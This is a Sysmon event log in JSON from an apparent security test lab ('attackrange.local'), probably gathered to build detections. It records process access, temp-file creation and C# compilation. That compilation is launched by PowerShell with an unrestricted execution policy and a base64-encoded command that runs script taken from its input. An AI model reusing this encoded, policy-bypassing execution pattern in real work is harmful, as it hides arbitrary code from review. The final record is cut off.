{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5564,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5565,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5566,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5567,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010C3260800}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010C3260800}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5568,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.525\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.525","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5569,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:17.697\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nProcessId: 872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\irfs1o1h.dll\r\nCreationUtcTime: 2020-08-01 06:55:17.697","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:17.697","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\irfs1o1h.dll","CreationUtcTime":"2020-08-01 06:55:17.697","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5570,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nProcessId: 872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\irfs1o1h.cmdline\r\nCreationUtcTime: 2020-08-01 06:55:17.697","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\irfs1o1h.cmdline","CreationUtcTime":"2020-08-01 06:55:17.697","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5571,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.705\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-00101D2C0800}\r\nProcessId: 4804\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\irfs1o1h.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nParentProcessId: 872\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.705","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-00101D2C0800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\irfs1o1h.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","ParentProcessId":"872","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5572,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nSourceProcessId: 872\r\nSourceThreadId: 5096\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-00101D2C0800}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 